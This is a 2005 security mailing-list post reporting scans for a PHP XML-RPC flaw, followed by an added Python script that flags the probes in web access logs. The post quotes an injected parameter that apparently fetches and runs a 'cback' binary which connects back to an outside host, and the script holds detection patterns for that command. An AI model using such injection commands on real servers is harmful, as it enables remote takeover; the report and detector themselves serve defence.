[Dshield] Someone is scanning for PHP XML RPC vulnerability

Stephane Grobety security at admin.fulgan.com
Tue Oct 11 07:31:08 GMT 2005


Apparently, someone is actively scanning for the PHP XMLRPC flaw. All
my web servers and three completely separate networks have been probed.

All the probes came from the same source IP:  216.33.212.32.

The following locations are probed:

//xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/services/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php

Unfortunately, I don't quite understand the command it gives to the
script. I think it's trying to connect back to 216.55.159.52 on 8080,
and the presence of chmod in it seems to indicate that it targets Unix
systems.

The relevant parameter is:

php-script='.60.255.44/cback;chmod_+x_cback;./cback_216.55.159.52_8080`;echo_'_end_';exit;/*

Does someone understand this script?

Good luck,
Stephane
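As an added example (not part of the original post), here is a small log-review script a defender could run over web server access logs to spot the probing described above: it flags requests for any of the xmlrpc.php locations listed in the message and, separately, requests whose query string carries the command-substitution fragments visible in the quoted parameter (chmod, backticks, the trailing `/*`). The log lines and the NCSA-style log format are constructed assumptions, not data from the post.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Locations the post reports being probed (copied from the message).
PROBED_PATHS = [
    "//xmlrpc.php", "/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/xmlsrv/xmlrpc.php",
    "/services/xmlrpc.php", "/blog/xmlrpc.php", "/drupal/xmlrpc.php",
    "/community/xmlrpc.php", "/blogs/xmlrpc.php", "/blogs/xmlsrv/xmlrpc.php",
    "/blog/xmlsrv/xmlrpc.php", "/blogtest/xmlsrv/xmlrpc.php",
    "/b2/xmlsrv/xmlrpc.php", "/b2evo/xmlsrv/xmlrpc.php", "/wordpress/xmlrpc.php",
]
# Collapse repeated slashes so "//xmlrpc.php" and "/xmlrpc.php" hit the same entry.
PROBED_NORMALISED = {re.sub(r"/+", "/", p) for p in PROBED_PATHS}

# NCSA/Apache-style access log line (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Fragments of the injected shell command quoted in the post: chmod on a
# dropped file, backtick command substitution, the "cback" file name, and
# the PHP comment opener that swallows the rest of the original statement.
INJECTION_RE = re.compile(r"chmod|`|\bcback\b|;exit;|/\*", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Return a finding dict for a suspicious request, or None for benign traffic."""
    rec = parse_line(line)
    if rec is None:
        return None
    url = unquote(rec["url"])  # decode %xx so URL-encoded payloads become visible
    path, _, query = url.partition("?")
    reasons = []
    if re.sub(r"/+", "/", path) in PROBED_NORMALISED:
        reasons.append("probed-path")
    if INJECTION_RE.search(query):
        reasons.append("command-injection")
    if not reasons:
        return None
    return {"ip": rec["ip"], "path": path, "reasons": reasons}


def scan(lines):
    """Classify every line and keep only the suspicious ones, in log order."""
    return [f for f in (classify(l) for l in lines) if f is not None]


def summarize(findings):
    """Count findings per source IP so a single scanner stands out."""
    return dict(Counter(f["ip"] for f in findings))


# Constructed sample log: three probes from one source (one carrying an
# encoded injection payload), one benign request, and one probe from elsewhere.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2005:07:02:13 +0000] "GET /xmlrpc.php HTTP/1.1" 404 291',
    '192.0.2.10 - - [11/Oct/2005:07:02:14 +0000] '
    '"POST /blog/xmlrpc.php?php-script=%60chmod_%2Bx_cback%60;exit;/* HTTP/1.1" 404 291',
    '198.51.100.7 - - [11/Oct/2005:07:02:15 +0000] "GET /index.php HTTP/1.1" 200 5123',
    '192.0.2.10 - - [11/Oct/2005:07:02:16 +0000] "GET //xmlrpc.php HTTP/1.0" 404 291',
    '203.0.113.5 - - [11/Oct/2005:07:03:01 +0000] "GET /wordpress/xmlrpc.php HTTP/1.1" 200 42',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["path"], ",".join(f["reasons"]))
    print("per-source counts:", summarize(found))
```

Matching on the decoded query string rather than the raw URL matters: the scanner in the post could just as easily URL-encode the backticks and semicolons, and a pattern applied to the raw line would miss them. A hit on "probed-path" alone is only a weak signal (real blog clients call xmlrpc.php too); the combination with "command-injection" from the same source is what warrants attention.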